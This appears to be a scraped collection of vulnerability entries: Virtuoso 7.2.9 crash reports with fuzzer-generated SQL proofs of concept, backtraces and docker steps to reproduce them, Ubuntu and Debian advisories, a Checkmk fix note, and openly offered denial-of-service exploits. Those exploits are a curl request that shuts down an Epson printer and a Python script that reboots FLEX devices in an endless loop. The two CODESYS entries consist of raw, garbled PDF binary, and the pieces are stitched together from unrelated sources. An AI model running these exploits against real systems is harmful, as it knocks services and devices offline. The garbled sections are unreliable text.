An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

SELECT CASE WHEN EXISTS (
      SELECT 1 FROM t2 WHERE x\=1 INTERSECT SELECT 1 FROM t2 WHERE y\=2
    )
THEN 1 ELSE 0 END;

backtrace:

#0 0x76cd17 (sqlo\_union\_scope+0x67)
#1 0x76cd10 (sqlo\_union\_scope+0x60)
#2 0x76cd10 (sqlo\_union\_scope+0x60)
#3 0x76dc84 (sqlo\_scope+0xd84)
#4 0x76d878 (sqlo\_scope+0x978)
#5 0x76d2b4 (sqlo\_scope+0x3b4)
#6 0x77c27a (sqlo\_select\_scope+0x5fa)
#7 0x76d347 (sqlo\_scope+0x447)
#8 0x70bd81 (sqlo\_top\_2+0x41)
#9 0x70b9d5 (sqlo\_top\_1+0x135)
#10 0x70d4c6 (sqlo\_top\_select+0x156)
#11 0x6b72bf (sql\_stmt\_comp+0x8bf)
#12 0x6ba122 (sql\_compile\_1+0x1a62)
#13 0x7c8cd0 (stmt\_set\_query+0x340)
#14 0x7cabc2 (sf\_sql\_execute+0x922)
#15 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#16 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#17 0xe1f01c (future\_wrapper+0x3fc)
#18 0xe2691e (\_thread\_boot+0x11e)
#19 0x7faf7a35b609 (start\_thread+0xd9)
#20 0x7faf7a12b133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31629: virtuoso 7.2.9 crashed at sqlo_union_scope · Issue #1139 · openlink/virtuoso-opensource

An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE VIEW t1(a) AS SELECT 1;
SELECT a, a, a FROM t1 WHERE a IN (1,5) AND a IN (9,8,3025,1000,3969)
       ORDER BY a, a DESC;

backtrace:

#0 0x6f6462 (sqlo\_preds\_contradiction+0x442)
#1 0x6fec43 (sqlo\_place\_table+0xe23)
#2 0x706bab (sqlo\_try+0xdb)
#3 0x70818c (sqlo\_layout\_1+0x94c)
#4 0x6e84fb (sqlo\_layout+0x5fb)
#5 0x70c075 (sqlo\_top\_2+0x335)
#6 0x70b9d5 (sqlo\_top\_1+0x135)
#7 0x70d4c6 (sqlo\_top\_select+0x156)
#8 0x6b72bf (sql\_stmt\_comp+0x8bf)
#9 0x6ba122 (sql\_compile\_1+0x1a62)
#10 0x7c8cd0 (stmt\_set\_query+0x340)
#11 0x7cabc2 (sf\_sql\_execute+0x922)
#12 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#13 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#14 0xe1f01c (future\_wrapper+0x3fc)
#15 0xe2691e (\_thread\_boot+0x11e)
#16 0x7f8d7a6e8609 (start\_thread+0xd9)
#17 0x7f8d7a4b8133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31631: virtuoso 7.2.9 crashed at sqlo_preds_contradiction · Issue #1137 · openlink/virtuoso-opensource

An issue in the kc_var_col component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE brin\_test(a INTEGER NOT NULL);
INSERT INTO brin\_test (a) VALUES(5);
INSERT INTO brin\_test (a) VALUES(5); 
ALTER TABLE brin\_test ADD c1 VARCHAR(20)  NOT NULL ;
UPDATE brin\_test SET a \= a + 1 WHERE a \= 5;

backtrace:

#0 0x5cfed5 (kc\_var\_col+0x155)
#1 0x5f6cb6 (page\_copy\_col+0x666)
#2 0x5d6e62 (page\_row\_bm+0x782)
#3 0x5db6b0 (page\_apply\_1+0xb90)
#4 0x5dd8d9 (page\_apply+0x119)
#5 0x86b517 (upd\_refit\_row+0x127)
#6 0x86ce54 (update\_node\_run\_1+0xdf4)
#7 0x821736 (update\_node\_vec\_run+0x836)
#8 0x86eaf2 (update\_node\_input+0x2b2)
#9 0x7ac43e (qn\_input+0x3ce)
#10 0x7acb6f (qn\_ts\_send\_output+0x23f)
#11 0x7b247e (table\_source\_input+0x16ee)
#12 0x7ac43e (qn\_input+0x3ce)
#13 0x7ac8a6 (qn\_send\_output+0x236)
#14 0x81e26d (set\_ctr\_vec\_input+0x94d)
#15 0x7ac43e (qn\_input+0x3ce)
#16 0x7bee59 (qr\_dml\_array\_exec+0x839)
#17 0x7cb872 (sf\_sql\_execute+0x15d2)
#18 0x7cbf4e (sf\_sql\_execute\_w+0x17e)
#19 0x7d4c0d (sf\_sql\_execute\_wrapper+0x3d)
#20 0xe1f01c (future\_wrapper+0x3fc)
#21 0xe2691e (\_thread\_boot+0x11e)
#22 0x7f2e9644f609 (start\_thread+0xd9)
#23 0x7f2e9621f133 (clone+0x43)

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
docker exec -i virtdb\_test isql 1111 dba < "/tmp/test.sql"

CVE-2023-31621: virtuoso 7.2.9 crashed at kc_var_col · Issue #1130 · openlink/virtuoso-opensource

Ubuntu Security Notice 6074-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, obtain sensitive information across domains, or execute arbitrary code. Irvan Kurniawan discovered that Firefox did not properly manage memory when using RLBox Expat driver. An attacker could potentially exploits this issue to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6074-1May 15, 2023firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in Firefox.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, obtain sensitiveinformation across domains, or execute arbitrary code. (CVE-2023-32205,CVE-2023-32207, CVE-2023-32210, CVE-2023-32211, CVE-2023-32212,CVE-2023-32213, CVE-2023-32215, CVE-2023-32216)Irvan Kurniawan discovered that Firefox did not properly manage memorywhen using RLBox Expat driver. An attacker could potentially exploits thisissue to cause a denial of service. (CVE-2023-32206)Anne van Kesteren discovered that Firefox did not properly validate theimport() call in service workers. An attacker could potentially exploitsthis to obtain sensitive information. (CVE-2023-32208)Sam Ezeh discovered that Firefox did not properly handle certain faviconimage files. If a user were tricked into opening a malicicous favicon file,an attacker could cause a denial of service. (CVE-2023-32209)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  firefox                         113.0+build2-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         113.0+build2-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to make all thenecessary changes.References:  https://ubuntu.com/security/notices/USN-6074-1  CVE-2023-32205, CVE-2023-32206, CVE-2023-32207, CVE-2023-32208,  CVE-2023-32209, CVE-2023-32210, CVE-2023-32211, CVE-2023-32212,  CVE-2023-32213, CVE-2023-32215, CVE-2023-32216Package Information:  https://launchpad.net/ubuntu/+source/firefox/113.0+build2-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/113.0+build2-0ubuntu0.18.04.1

Ubuntu Security Notice USN-6074-1

Debian Linux Security Advisory 5402-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5402-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 13, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-0386 CVE-2023-31436 CVE-2023-32233

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-0386

    It was discovered that under certain conditions the overlayfs  
    filesystem implementation did not properly handle copy up  
    operations. A local user permitted to mount overlay mounts in user  
    namespaces can take advantage of this flaw for local privilege  
    escalation.

CVE-2023-31436

    Gwangun Jung reported a a flaw causing heap out-of-bounds read/write  
    errors in the traffic control subsystem for the Quick Fair Queueing  
    scheduler (QFQ) which may result in information leak, denial of  
    service or privilege escalation.

CVE-2023-32233

    Patryk Sondej and Piotr Krysiuk discovered a use-after-free flaw in  
    the Netfilter nf_tables implementation when processing batch  
    requests, which may result in local privilege escalation for a user  
    with the CAP_NET_ADMIN capability in any user or network namespace.

For the stable distribution (bullseye), these problems have been fixed in  
version 5.10.179-1.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmRfblBfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0S/ehAAimoZ2PphbMF53apge94ZKEnKKG2k43nEIDBumQsa8tFCmVxHKrxTV+qo  
2OnkmuXO2W7kexlHNtnHfKie7pYI+0vLrxNQqyBBDHfUAvUC7cvVgZUG+O+K9v+r  
TY60UJBkVwW3bY99MUMtwSsy0pN7dHqc/YQTWacPYSVuZ/GRn5/PLhDu9p6vdROD  
BxYtcGF93I0EfGgjCqPZ16rivCwtIck4/GaQCBgypDa2N0h92Y/uTEebaA3LEC72  
DuiJc1kPHpecGe11Xay1+KVt0q3CjwAxbjj740t/ySn+OzGqbSRpLk5IIsLuZL8F  
hh+tsB3PDTpO9yOVNokO7h0wlja03uVFyddwPf8jkv0fsFo26OTkl1aISA6/gmT2  
hymNBwPs5OAxX2f7Fe9jwHllBlLCb+xwiejBcrdNUMOsG2Krd7B5ABlj4shQPylQ  
9NxPHgk9GrCjBFcRaCPoQBaIw5AT7R3Rv7xkyH/XzlXCvuckiJlZMwIw7AVDnRtv  
orZ42xSxaZu1AyIVv48f2JinLrLTBIjj7BQrzq5M+9SXL3bGbv9ChzwoxSK7STc4  
UJ13fZxmQbC50c0xmT1VbiYDIeE85cCOkuF+Heyqw3vJioFFl9tHEt8GT1FrHoUl  
9IcX1l0CB62Sh7s8jdFnvSVur5ZfZbXyUIxWeNIHrF9PinQsVJY=  
=sqnY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5402-1

Epson Stylus SX510W suffers from a power off denial of service vulnerability.

    # Exploit Title: Epson Stylus SX510W Printer Remote Power Off - Denial of Service (PoC)# Discovery by: Rafael Pedrero# Discovery Date: 2020-05-16# Vendor Homepage: https://www.epson.es/# Software Link :https://www.epson.es/products/printers/inkjet-printers/for-home/epson-stylus-sx510w# Tested Version: EPSON_Linux UPnP/1.0 Epson UPnP SDK/1.0# Tested on: Linux/Windows# Vulnerability Type: Denial of Service (DoS)1. DescriptionThe vulnerability occurs when 2 or more &'s are sent to the server in a row("/PRESENTATION/HTML/TOP/INDEX.HTML") causing it to shutdown.2. Proof of ConceptRequest:curl -s "http://<printer_ip_address>/PRESENTATION/HTML/TOP/INDEX.HTML?RELOAD=&&tm=1589865865549"3. Solution:This version product is deprecated.-->

Epson Stylus SX510W Denial Of Service

FLEX versions prior to 1085 Web 1.6.0 suffer from a denial of service vulnerability.

    # Exploit Title: FLEX 1080 < 1085 Web 1.6.0 - Denial of Service# Date: 2023-05-06# Exploit Author: Mr Empy# Vendor Homepage: https://www.tem.ind.br/# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94# Version: 1.6.0# Tested on: Android# CVE ID: CVE-2022-2591#!/usr/bin/env python3import requestsimport reimport argparsefrom colorama import Foreimport timedef main():    def banner():        print('''            ________    _______  __           / ____/ /   / ____/ |/ /          / /_  / /   / __/  |   /         / __/ / /___/ /___ /   |        /_/   /_____/_____//_/|_|[FLEX 1080 < 1085 Web 1.6.0 - Denial of Service]''')    def reboot():        r = requests.get(f'http://{arguments.target}/sistema/flash/reboot')        if 'Rebooting' in r.text:            pass        else:            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardwarenão é vulnerável')            quit()    banner()    print(f'{Fore.LIGHTBLUE_EX}[*] {Fore.LIGHTWHITE_EX} Iniciando o ataque')    while True:        try:            reboot()            print(f'{Fore.LIGHTGREEN_EX}[+] {Fore.LIGHTWHITE_EX} Hardwarederrubado com sucesso!')            time.sleep(1)        except:#            print(f'{Fore.LIGHTRED_EX}[-] {Fore.LIGHTWHITE_EX}O hardwareestá inativo')            passif __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument('-t','--target', action='store', help='Target',dest='target', required=True)    arguments = parser.parse_args()    try:        main()    except KeyError:        quit()

FLEX Denial Of Service

In multiple CODESYS products in multiple versions an unauthorized, remote attacker may use a improper input validation vulnerability to read from invalid addresses leading to a denial of service.

%PDF-1.7 %���� 1 0 obj <>/Metadata 365 0 R/ViewerPreferences 366 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.32 841.92\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��W�n�6�o�������U�cV4��EP���b�S�ny��ee�b�Lj9 dQ�{ν�������ܤ���\*}���7,f�{ÇYֻHo'yZM��7��\\ׯY:���Cr|�'��!����?����Ys�v�xBt����\*N�&e����ɻ�e?���\[|Ì%�i��{?Mo3MN ������R��&�ɼ�C|z�IBC�7��mp" ��ĉ�B�!0r��烤���y�s��3���b�ט�Xr��hp�qQUŴ٧gEQ�|�j��2��,�4�TZ��.�J"�PZ���\*����(���U�M��$���0R� �,��j�0��y��E��9�َ�����F<Y�Yn,�Gs+9o�ɿn�86u48���CS�E3\]���|����� fi���������i~K�,���?'!8�n��MxS�1�5����\\���?4�$\\�G.#q�l��\]¹��kK?Z�Z6k���b�Y����}SHy!�kh-��b�\\��Љ��ڜ���i�4�d�0����6���H��!��l�GZ��,L�7S�$�H9x����8|Z��2�:!��G���RcuT�.��@����xX񙢧~})��O�|W�1�C>��ӕ�"w�g�J�~\[�ڦ�lL�7��5v��l\]SBo����������s��|վ,83T־\]��+۷+8�}f��f4f��:+3e����\]�8�t���ר^�߸B��4K�< \`�}���kwZ��+�������,�V�\*�¶d�2���)�I,�0��g;�j��\_2U���s\*81(�j$q��-+��-�K�-/�6�nݣ�Aь��e\]>;5�{��D�1ƭV��Zw3�"�H���z���gR5���;���D��I�,��}�X\*g%�������P�V���,���F�\_�եk!e�I�U�x��v (�\\��N��6{7\`l�ѝ�p�,�����0K��G�b9���ef5���42��8A��=�b��܁-�-g\*���k��m��j�$��tK������eF\`��5u��WV��u����Q\] �g��iс��<� ��G�X�t��戛����e�r?��J ?ɏ�� endstream endobj 5 0 obj <> stream ����JFIF\`\`��JExifMM\*2:(\`\`��XICC\_PROFILEHLinomntrRGB XYZ � 1acspMSFTIEC sRGB���-HP cprtP3desc�lwtpt�bkptrXYZgXYZ,bXYZ@dmndTpdmdd��vuedL�view�$lumi�meas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ �Q�XYZ XYZ o�8��XYZ b����XYZ $����descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view��\_.���\\�XYZ L VPW�meas�sig CRT curv #(-27;@EJOTY^chmrw|������������������������� %+28>ELRY\`gnu|����������������&/8AKT\]gqz������������!-8COZfr~���������� -;HUcq~��������� +:IXgw��������'7HYj{�������+=Oat�������2FZn�������  % : O d y � � � � � �  ' = T j � � � � � �"9Qi������\*C\\u����� & @ Z t � � � � �.Id���� %A^z���� &Ca~����1Om����&Ed����#Cc����'Ij����4Vx���&Il����Ae����@e���� Ek���\*Qw���;c���\*R{���Gp���@j���>i���  A l � � �!!H!u!�!�!�"'"U"�"�"�# #8#f#�#�#�$$M$|$�$�% %8%h%�%�%�&'&W&�&�&�''I'z'�'�( (?(q(�(�))8)k)�)�\*\*5\*h\*�\*�++6+i+�+�,,9,n,�,�--A-v-�-�..L.�.�.�/$/Z/�/�/�050l0�0�11J1�1�1�2\*2c2�2�3 3F33�3�4+4e4�4�55M5�5�5�676r6�6�7$7\`7�7�88P8�8�99B99�9�:6:t:�:�;-;k;�;�<'

CVE-2022-47391

An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.

%PDF-1.7 %���� 1 0 obj <>/Metadata 373 0 R/ViewerPreferences 374 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/Font<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 595.32 841.92\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��Wmo�6�n���>RD�\]dH�$밢�u(�"Pm%�\`K�"o�Oڿ�Qv�,�L���@6ES���{t읗��.�Tpv�;��t�9��Mo\\,?�Əˬ�.���i5+��h���S?f�4+�}��w=2p������0���� '�;�NS��\*N��2�v~��ng3���\[?Ì�ɢ��^����a�l�^�+E��O���Wu�w��mp��Z��T(����z�j�����G���\\�6/1�k�� ��!�EU��^E�5�/v�R�v8�5M��W\*�����\*�hBi �� ��\[�n��^�7d�v%�2�E��\_GŚ\\��k)��ky$�-:pf�OA��f�\_�jn%�K9��wMSg�����\*,�ź>���y�3��c�-������X��4������(���;�Fo��cB1��f���~�^�A��&1x�e?g�����-�\\\[��h9k٬Q!��2���<�:��+�����-�цr����Љ�!�\[��J�s��F�$�Y��Ȓ ��1��IV˩���7Y�ֳw��(!�(9x��~p9��њ�e�!5.�H���N��,�H����8C��9 ��yz/߭>�g>��}j��0����3C�aa���SA��s�N���� ��n��L�Z;������ǡ�o������o|����p.��@����ZFm�� �nm�t�!;�@3G�|���m�p;THG �)O T���3�V \*}�V͇'Ω�\`��b�щ���JiKf(�E;��ڎ�qP4�څ�l��H������s\\㫕nW�q��42���p}Br�cR5��ww��$��s$HZeQ���b�t!<޶%�%�G�!�8��ğ<�\`1�m�m�0�����d�F1v�������N�+�~H�9a�Qی�ʧ۫�Ot>�y�i��AG�s��0˭��\`����#G�z\*�\`

CVE-2022-47390

Denial of service in Webconf in Tribe29 Checkmk Appliance before 1.6.5.

Component

Firmware

Title

Fix denial of service against webconf

Date

Apr 18, 2023

Appliance Version

1.6.5

Level

Trivial Change

Class

Bug Fix

Compatibility

Compatible - no manual interaction needed

Prior to this Werk an attacker was able to cause blocking IO in _webconf_ rendering it unresponsive. (Denial of Service)

This vulnerability was identified through a commissioned penetration test conducted by OPTIMAbit (Roman Mueller).

**Mitigations**: In case updateing is not possible, one can limit access to Webconf to trusted IPs e.g. within Apache.

**Indicators of Compromise**: After a malicious/faulty request _webconf_ will not be accessible for about 5 minutes. After these 5 minutes one can find messages containing \[Errno 32\] Broken pipe in /var/log/syslog.

**Vulnerability Management**: We have rated the issue with a CVSS Score of 7.5 (High) with the following CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H. We assigned CVE-2023-22318 to this vulnerability.

To the list of all Werks

Tag

#dos